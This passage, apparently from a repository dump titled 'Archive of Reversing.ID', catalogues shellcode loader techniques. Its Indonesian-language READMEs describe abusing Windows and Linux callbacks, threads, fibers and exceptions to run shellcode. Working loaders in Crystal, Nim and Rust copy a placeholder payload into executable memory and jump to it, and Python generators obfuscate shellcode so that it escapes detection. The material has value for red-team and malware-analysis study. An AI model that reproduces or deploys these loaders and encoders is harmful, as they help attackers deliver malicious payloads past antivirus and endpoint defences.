22 | - [MSDN HeapCreate](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapcreate)
23 | - [MSDN HeapFree](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapfree)
24 | - [MSDN HeapDestroy](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapdestroy)


--------------------------------------------------------------------------------
/windows/execution/thread/RtlCreateUserThread/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `RtlCreateUserThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`.
 8 | 
 9 | `RtlCreateUserThread` adalah fungsi internal dan bersifat low-level.
10 | 
11 | ```c++
12 | NTSTATUS RtlCreateUserThread (HANDLE ProcessHandle, PSECURITY_DESCRIPTOR SecurityDescriptor, BOOLEAN CreateSuspended, ULONG StackZeroBits, PULONG StackReserved, PULONG StackCommit, PVOID StartAddress, PVOID StartParameter, PHANDLE ThreadHandle, PCLIENT_ID ClientID);
13 | 
14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [NTInternals RtlCreateUserThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FRtlCreateUserThread.html)
20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)


--------------------------------------------------------------------------------
/windows/storage/stack/crystal/code.cr:
--------------------------------------------------------------------------------
 1 | #   Shellcode Loader
 2 | #   Archive of Reversing.ID 
 3 | #
 4 | #   storing payload in stack 
 5 | #
 6 | # Run:
 7 | #   $ code.cr 
 8 | # 
 9 | # Technique:
10 | #   - allocation:   VirtualAlloc
11 | #   - writing:      memcpy
12 | #   - permission:   VirtualProtect
13 | #   - execution:    invoke directly
14 | 
15 | # define PAGE_EXECUTE_READ because it's not defined in lib
16 | PAGE_EXECUTE_READ = 0x20 
17 | 
18 | # shellcode storage in stack
19 | payload = IO::Memory.new Bytes[  0x90, 0x90, 0xCC, 0xC3 ]
20 | 
21 | # allocate memory buffer for payload as READ-WRITE (no executable)
22 | runtime = LibC.VirtualAlloc(nil, payload.size, LibC::MEM_COMMIT | LibC::MEM_RESERVE, LibC::PAGE_READWRITE)
23 | 
24 | # copy payload to the buffer 
25 | Intrinsics.memcpy(runtime, payload.buffer, payload.size, false)
26 | 
27 | # make buffer executable (R-X)
28 | LibC.VirtualProtect(runtime, payload.size, PAGE_EXECUTE_READ, out _)
29 | 
30 | # execute the payload 
31 | t = Proc(Int32).new(runtime, runtime)
32 | t.call 


--------------------------------------------------------------------------------
/windows/execution/callback/WsPullBytes/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `WsPullBytes`.
 8 | 
 9 | ```c++
10 | HRESULT WsPullBytes (WS_XML_WRITER *writer, WS_PULL_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error);
11 | 
12 | HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error);
13 | 
14 | HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN WsPullBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspullbytes)
20 | - [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter)
21 | - [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput)


--------------------------------------------------------------------------------
/windows/execution/callback/WsPushBytes/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `WsPushBytes`.
 8 | 
 9 | ```c++
10 | HRESULT WsPushBytes (WS_XML_WRITER *writer, WS_PUSH_BYTES_CALLBACK callback, void *callbackState, WS_ERROR *error);
11 | 
12 | HRESULT WsCreateWriter (const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_XML_WRITER **writer, WS_ERROR *error);
13 | 
14 | HRESULT WsSetOutput (WS_XML_WRITER *writer, const WS_XML_WRITER_ENCODING *encoding, const WS_XML_WRITER_OUTPUT *output, const WS_XML_WRITER_PROPERTY *properties, ULONG propertyCount, WS_ERROR *error);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN WsPushBytes](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wspushbytes)
20 | - [MSDN WsCreateWriter](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wscreatewriter)
21 | - [MSDN WsSetOutput](https://docs.microsoft.com/en-us/windows/win32/api/webservices/nf-webservices-wssetoutput)


--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Transform the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | `Bit-Mixing` adalah teknik atau proses manipulasi bit berupa pencampuran bit-bit dari blok data berbeda untuk menghasilkan blok data baru. Proses ini dilakukan dengan operasi `XOR`, `AND`, `OR`, `shifting`, dan `rotation`.
 8 | 
 9 | Penerapan `Bit-Mixing` dalam shellcode digunakan haruslah merupakan proses yang dapat dibalikkan (invertible).
10 | 
11 | `Swap` adalah variasi dari pencampuran bit dengan menukar bit-bit dari block data berbeda. Teknik ini dapat pula disebut sebagai `Cross-Over` yang lebih generik.
12 | 
13 | Blok data terdiri atas dua komponen, `Left` dan `Right`. Ambil `N` bit dari posisi `P` dari `Left` dan `Right`, tukar kedua potongan bit tersebut.
14 | 
15 | Berikut adalah algoritma yang diterapkan, ambil `N=3` bit dari posisi `P=2` dari `Left` dan `Right`:
16 | 
17 | ```
18 | extract(X) = X & 0x1E
19 | clear(x)   = X & 0xE1
20 | 
21 | L' = clear(L) | extract(R)
22 | R' = clear(R) | extract(L)
23 | ```


--------------------------------------------------------------------------------
/windows/execution/exception/AddVectoredExceptionHandler/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing exception to run the shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode melalui exception yang telah didaftarkan melalui `AddVectoredExceptionhandler` dan dipicu dengan `RaiseException`.
 8 | 
 9 | ```c++
10 | PVOID AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
11 | 
12 | void RaiseException (DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments);
13 | 
14 | ULONG RemoveVectoredExceptionHandler (PVOID Handle);
15 | ```
16 | 
17 | ### Reference
18 | 
19 | - [MSDN AddVectoredExceptionhandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler)
20 | - [MSDN RaiseException](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-raiseexception)
21 | - [MSDN RemoveVectoredExceptionHandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-removevectoredexceptionhandler)


--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateRemoteThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`.
 8 | 
 9 | `CreateRemoteThread` umumnya digunakan untuk menjalankan thread di remote process. Namun thread baru dapat pula dieksekusi di process sendiri dengan memberikan handle `hProcess` bernilai `GetCurrentProcess()`.
10 | 
11 | ```c++
12 | HANDLE CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
13 | 
14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN CreateRemoteThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread)
20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)


--------------------------------------------------------------------------------
/windows/writing/encryption/stream/rc4/SystemFunction/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi RC4 menggunakan fungsi `SystemFunction032` atau `SystemFunction033` yang merupakan API internal (tak terdokumentasi).
 8 | 
 9 | Fungsi `SystemFunction032` digunakan untuk melakukan enkripsi dan `SystemFunction033` digunakan untuk dekripsi. Namun secara internal, keduanya menunjuk pada offset sama sehingga kedua fungsi dapat digunakan untuk melakukan enkripsi dan dekripsi menggunakan key yang sama.
10 | 
11 | ```c++
12 | NTSTATUS SystemFunction032 (struct ustring* data, struct ustring* key);
13 | 
14 | NTSTATUS SystemFunction033 (struct ustring* data, struct ustring* key);
15 | 
16 | typedef struct
17 | {
18 |     DWORD Length;
19 |     DWORD MaximumLength;
20 |     PVOID Buffer;
21 | } ustring;
22 | ```
23 | 
24 | ### Reference
25 | 
26 | - [WineAPI SystemFunction032](https://source.winehq.org/WineAPI/SystemFunction032.html)
27 | - [ReactOS SystemFunction032](https://doxygen.reactos.org/df/d13/sysfunc_8c.html#a66d55017b8625d505bd6c5707bdb9725)


--------------------------------------------------------------------------------
/windows/execution/invoke/nim/code.nim:
--------------------------------------------------------------------------------
 1 | #[
 2 |     Shellcode Loader
 3 |     Archive of Reversing.ID
 4 | 
 5 |     Executing shellcode by jump to it.
 6 | 
 7 | Compile:
 8 |     $ nim c code.nim
 9 | 
10 | Technique:
11 |     - allocation: VirtualAlloc
12 |     - writing     copyMem
13 |     - permission: VirtualProtect
14 |     - execution:  
15 | ]#
16 | import winim 
17 | 
18 | when isMainModule:
19 |     var old_protect: DWORD = 0
20 | 
21 |     # shellcode storage in stack
22 |     var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3]
23 | 
24 |     # allocate memory buffer for payload as READ-WRITE (no executable)    
25 |     var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE)
26 | 
27 |     # copy payload to the buffer
28 |     copyMem(runtime, unsafeAddr payload, payload.len)
29 | 
30 |     # make buffer executable (R-X)
31 |     var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect)
32 |     if retval != 0:
33 |         let f = cast[proc(){.nimcall.}](runtime)
34 |         f()
35 |     
36 |     VirtualFree(runtime, payload.len, MEM_RELEASE)
37 | 


--------------------------------------------------------------------------------
/windows/writing/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Teknik dalam `writing` adalah metode transformasi shellcode yang tersimpan. Shellcode yang tersimpan secara plain berpotensi tinggi untuk terdeteksi sehingga shellcode harus diacak untuk menyamarkannya. Untuk mendapatkan shellcode kembali, maka proses transformasi dilakukan sebelum atau saat menulis shellcode ke area yang ditentukan.
 6 | 
 7 | Teknik `writing` dapat dibagi menjadi beberapa kategori berdasarkan karakteristik:
 8 | 
 9 | - [compression](compression): kompresi terhadap shellcode untuk mengurangi ukuran.
10 | - [conversion](conversion): mengubah representasi shellcode menjadi bentuk yang umum.
11 | - [copy](copy): menyalin shellcode menggunakan beberapa fungsi tanpa adanya transformasi tambahan.
12 | - [custom](custom): teknik-teknik unik di luar kategori yang ada.
13 | - [encryption](encryption): enkripsi shellcode dengan algoritma enkripsi simetris atau asimetris.
14 | - [permutation](permutation): penyusunan ulang byteberdasarkan aturan semi-acak.
15 | - [substitution](substitution): mengganti byte berdasarkan pemetaan.


--------------------------------------------------------------------------------
/linux/execution/callback/fts_open/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `fts_open` dan `fts_read` (glibc).
 8 | 
 9 | Fungsi `fts_open` dan `fts_read` adalah bagian dari pustaka FTS (File Tree Scan) dan didesain untuk menelusuri hirarki file. Pustaka ini bukan bagian dari libc standard namun diimplementasikan dalam banyak UNIX-like operating system.
10 | 
11 | FTS adalah layer abstraksi dari `opendir` dan `readdir` secara rekursif untuk menelusuri tree. Callback digunakan untuk mengurutkan file.
12 | 
13 | ```c++
14 | #include <sys/types.h>
15 | #include <sys/stat.h>
16 | #include <fts.h>
17 | 
18 | typedef int (*callback_t)(const FTSENT **, const FTSENT **);
19 | 
20 | FTS * fts_open (char * const * path_argv, int options, callback_t comparator);
21 | ```
22 | 
23 | Meski digunakan oleh `fts_open` tapi callback hanya akan dijalankan ketika `fts_read` digunakan untuk menelusuri path.
24 | 
25 | ### Reference
26 | 
27 | - [Man 3 fts_open](https://linux.die.net/man/3/fts_open)
28 | - [Man 3 fts_read](https://linux.die.net/man/3/fts_read)


--------------------------------------------------------------------------------
/windows/execution/callback/MappingRecognizeText/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `MappingRecognizeText`.
 8 | 
 9 | ```c++
10 | HRESULT MappingRecognizeText (PMAPPING_SERVICE_INFO pServiceInfo, LPCWSTR pszText, DWORD dwLength, DWORD dwIndex, PMAPPING_OPTIONS pOptions, PMAPPING_PROPERTY_BAG pbag);
11 | 
12 | HRESULT MappingGetServices (PMAPPING_ENUM_OPTIONS pOptions, PMAPPING_SERVICE_INFO *prgServices, DWORD *pdwServicesCount);
13 | 
14 | HRESULT MappingFreeServices (PMAPPING_SERVICE_INFO pServiceInfo);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN MappingRecognizeText](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingrecognizetext)
20 | - [MSDN MappingGetServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappinggetservices)
21 | - [MSDN MappingFreeServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingfreeservices)
22 | - [MSDN structure MAPPING_OPTIONS](https://docs.microsoft.com/en-us/windows/win32/api/elscore/ns-elscore-mapping_options)


--------------------------------------------------------------------------------
/windows/execution/fiber/RtlUserFiberStart/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a fiber.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `RtlUserFiberStart`.
 8 | 
 9 | `RtlUserFiberStart` adalah fungsi internal dan bersifat low-level.
10 | 
11 | ```c++
12 | NTSTATUS RtluserFiberStart();
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN TEB (Thread Environment Block)](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-teb)
18 |     - [TEB](https://processhacker.sourceforge.io/doc/struct___t_e_b.html)
19 |     - [TEB32](https://processhacker.sourceforge.io/doc/struct___t_e_b32.html)
20 | - [Wiki Thread Information Block](https://en.wikipedia.org/wiki/Win32_Thread_Information_Block)
21 |     - [NT_TIB](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20|%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB)
22 |     - [NT_TIB32](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB32)
23 | - [MSDN NtCurrentTeb](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-ntcurrentteb)


--------------------------------------------------------------------------------
/windows/execution/callback/ReadFileEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `ReadFileEx`.
 8 | 
 9 | ```c++
10 | BOOL ReadFileEx (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);
11 | 
12 | HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
13 | 
14 | HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN ReadFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfileex)
20 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea)
21 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew)


--------------------------------------------------------------------------------
/windows/execution/callback/WriteFileEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `WriteFileEx`.
 8 | 
 9 | ```c++
10 | BOOL WriteFileEx (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPOVERLAPPED lpOverlapped, LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);
11 | 
12 | HANDLE CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
13 | 
14 | HANDLE CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN WriteFileEx](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefileex)
20 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea)
21 | - [MSDN CreateFileA](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew)


--------------------------------------------------------------------------------
/windows/allocation/RtlAllocateHeap/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `RtlAllocateHeap`. Namun, alokasi dilakukan pada segment heap terpisah dan tidak menggunakan Heap default.
 8 | 
 9 | ```c++
10 | PVOID RtlAllocateHeap (PVOID HeapHandle, ULONG Flags, SIZE_T Size);
11 | 
12 | PVOID RtlCreateHeap (ULONG Flags, PVOID HeapBase, SIZE_T ReserveSize, SIZE_T CommitSize, PVOID Lock, PRTL_HEAP_PARAMETERS Parameters);
13 | 
14 | LOGICAL RtlFreeHeap (PVOID HeapHandle, ULONG Flags, PVOID BaseAddress);
15 | 
16 | PVOID RtlDestroyHeap (PVOID HeapHandle);
17 | ```
18 | 
19 | ### Reference 
20 | 
21 | - [MSDN RtlAllocateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlallocateheap)
22 | - [MSDN RtlCreateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcreateheap)
23 | - [MSDN RtlFreeHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlfreeheap)
24 | - [MSDN RtlDestroyheap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtldestroyheap)


--------------------------------------------------------------------------------
/windows/storage/stack/nim/code.nim:
--------------------------------------------------------------------------------
 1 | #[
 2 |     Shellcode Loader
 3 |     Archive of Reversing.ID
 4 | 
 5 |     storing payload in stack
 6 | 
 7 | Compile:
 8 |     $ nim c code.nim
 9 | 
10 | Technique:
11 |     - allocation: VirtualAlloc
12 |     - permission: VirtualProtect
13 |     - execution:  CreateThread
14 | ]#
15 | import winim 
16 | 
17 | when isMainModule:
18 |     var old_protect: DWORD = 0
19 | 
20 |     # shellcode storage in stack
21 |     var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3 ]
22 | 
23 |     # allocate memory buffer for payload as READ-WRITE (no executable)    
24 |     var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE)
25 | 
26 |     # copy payload to the buffer
27 |     copyMem(runtime, unsafeAddr payload, payload.len)
28 | 
29 |     # make buffer executable (R-X)
30 |     var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect)
31 |     if retval != 0:
32 |         var thread = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](runtime), nil, 0, nil)
33 |         WaitForSingleObject(thread, -1)
34 |     
35 |     VirtualFree(runtime, payload.len, MEM_RELEASE)
36 | 


--------------------------------------------------------------------------------
/windows/writing/custom/xor-chain/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Transform the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Melakukan `XOR` secara berantai antara byte sekarang dengan byte sebelumnya. 
 8 | 
 9 | Teknik ini didasarkan pada mode operasi `CBC (Cipher Block)` pada enkripsi block cipher. Pada `CBC`, setiap block plaintext akan di-XOR dengan block ciphertext sebelumnya sebelum dilakukan enkripsi. Blok awal akan dioperasikan dengan sebuah blok bernama `IV (Initialization Vector)`. Sehingga, dapat kita tulis sebagai berikut:
10 | 
11 | ```
12 | C[i] = Enc(P[i] ^ C[i - 1], K)
13 | C[0] = Enc(P[0] ^ IV, K)
14 | ```
15 | 
16 | Sementara pada teknik ini, operasi berada pada level byte. Setiap byte akan di-XOR dengan byte ciphertext sebelumnya. Adapun kunci awal (genesis) merupakan byte pertama dalam shellcode yang tidak mengalami enkripsi.
17 | 
18 | ```
19 | C[i] = P[i] ^ C[i - 1]
20 | C[0] = P[0]
21 | ```
22 | 
23 | Variasi lain adalah dengan menggunakan bilangan acak sebagai genesis key (atau juga `IV`), sehingga byte awal shellcode akan dienkripsi dengan byte tersebut.
24 | 
25 | ```
26 | C[i] = P[i] ^ C[i - 1]
27 | C[0] = P[0] ^ K
28 | ```


--------------------------------------------------------------------------------
/windows/execution/invoke/rust/with-mmap/src/main.rs:
--------------------------------------------------------------------------------
 1 | /*
 2 |     Shellcode Loader
 3 |     Archive of Reversing.ID
 4 | 
 5 |     Storing payload in stack.
 6 | 
 7 | Compile:
 8 |     $ cargo build
 9 | 
10 | Technique:
11 |     - allocation: Memorymap::new
12 |     - permission: 
13 |     - execution:  unsafe call to function pointer
14 | 
15 | Note:
16 |     - minimalistic code
17 | 
18 | Dependencies:
19 |     - mmap==0.1.0 -> allocate executable section
20 | */
21 | 
22 | extern crate mmap;
23 | 
24 | use std::{mem, ptr};
25 | use mmap::{MapOption, MemoryMap};
26 | 
27 | fn main() {
28 |     let opts = [
29 |         MapOption::MapReadable,
30 |         MapOption::MapWritable,
31 |         MapOption::MapExecutable
32 |     ];
33 | 
34 |     // shellcode storage in stack
35 |     let payload = [ 0x90, 0x90, 0xCC, 0xC3 ];
36 |     
37 |     // allocate a memory buffer for payload
38 |     let runtime = MemoryMap::new (payload.len(), &opts).unwrap();
39 | 
40 |     unsafe {
41 |     // copy payload to the buffer
42 |         ptr::copy (payload.as_ptr(), runtime.data(), payload.len());
43 |     
44 |     // execute the function
45 |         mem::transmute::<_, fn()>(runtime.data())();
46 |     }
47 | }


--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and
 2 | # generate the encoded shellcode 
 3 | 
 4 | import random
 5 | 
 6 | # make sure n is 0 < n < m
 7 | rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
 8 | rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)
 9 | 
10 | extract = lambda X: X & 0x1E
11 | clear   = lambda X: X & 0xE1
12 | 
13 | cross = lambda L,R: (clear(L) | extract(R), clear(R) | extract(L))
14 | 
15 | 
16 | with open("shellcode.bin", "rb") as f:
17 |     shcode = f.read()
18 | shlen = len(shcode)
19 | 
20 | # encode shellcode
21 | if shlen % 2 == 1:
22 |     shcode += b"\x90"
23 |     shlen += 1
24 | 
25 | # generate single byte key
26 | key = random.randrange(1,255)
27 | 
28 | # encode shellcode
29 | enc_shcode = [key]
30 | idx = 0
31 | while idx < shlen:
32 |     L = shcode[idx]
33 |     R = shcode[idx + 1]
34 | 
35 |     L, R = cross(L, R)
36 | 
37 |     # extract the bits and replace
38 |     enc_shcode.append(rotl8(L, 3) ^ key)
39 |     enc_shcode.append(rotr8(R, 3) ^ key)
40 |     
41 |     idx += 2
42 | 
43 | # print as C-array
44 | print("{ ", end='')
45 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
46 | print(" }")


--------------------------------------------------------------------------------
/windows/execution/event/CreateThreadpoolWait/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateThreadpoolWait`.
 8 | 
 9 | Thread pool adalah sekumpulan worker thread yang mengeksekusi callback secara asinkron.
10 | 
11 | ```c++
12 | PTP_WAIT CreateThreadpoolWait(PTP_WAIT_CALLBACK pfnwa, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);
13 | 
14 | void SetThreadpoolWait(PTP_WAIT pwa, HANDLE h, PFILETIME pftTimeout);
15 | 
16 | HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);
17 | 
18 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
19 | ```
20 | 
21 | ### Reference 
22 | 
23 | - [MSDN CreateThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwait)
24 | - [MSDN SetThreadpoolWait](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpoolwait)
25 | - [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
26 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)


--------------------------------------------------------------------------------
/windows/writing/custom/bit-rotation/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and
 2 | # generate the encoded shellcode 
 3 | 
 4 | # make sure n is 0 < n < m
 5 | rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
 6 | rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)
 7 | 
 8 | rotl16 = lambda x,n: ((x << n) & 0xFFFF) | (x >> (16 - n))
 9 | rotr16 = lambda x,n: (x >> n) | ((x << (16 - n)) & 0xFFFF)
10 | 
11 | make_word = lambda L,R: (L << 8) | R
12 | 
13 | 
14 | with open("shellcode.bin", "rb") as f:
15 |     shcode = f.read()
16 | shlen = len(shcode)
17 | 
18 | # encode shellcode
19 | if shlen % 2 == 1:
20 |     shcode += b"\x90"
21 |     shlen += 1
22 | 
23 | # encode shellcode
24 | enc_shcode = []
25 | idx = 0
26 | while idx < shlen:
27 |     L = shcode[idx]
28 |     R = shcode[idx + 1]
29 | 
30 |     # byte-level rotation
31 |     L = rotl8(L, 3)
32 |     R = rotr8(R, 7)
33 | 
34 |     # word-level rotation 
35 |     W = make_word(L, R)
36 |     W = rotr16(W, 5)
37 | 
38 |     # split word into byte
39 |     enc_shcode.append((W >> 8) & 0xFF)
40 |     enc_shcode.append(W & 0xFF)
41 |     
42 |     idx += 2
43 | 
44 | # print as C-array
45 | print("{ ", end='')
46 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
47 | print(" }")


--------------------------------------------------------------------------------
/windows/writing/custom/bit-crossover/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and
 2 | # generate the encoded shellcode 
 3 | 
 4 | import random 
 5 | 
 6 | # make sure n is 0 < n < 8
 7 | rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
 8 | rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)
 9 | 
10 | high  = lambda x: x & 0xF0
11 | low   = lambda x: x & 0x0F
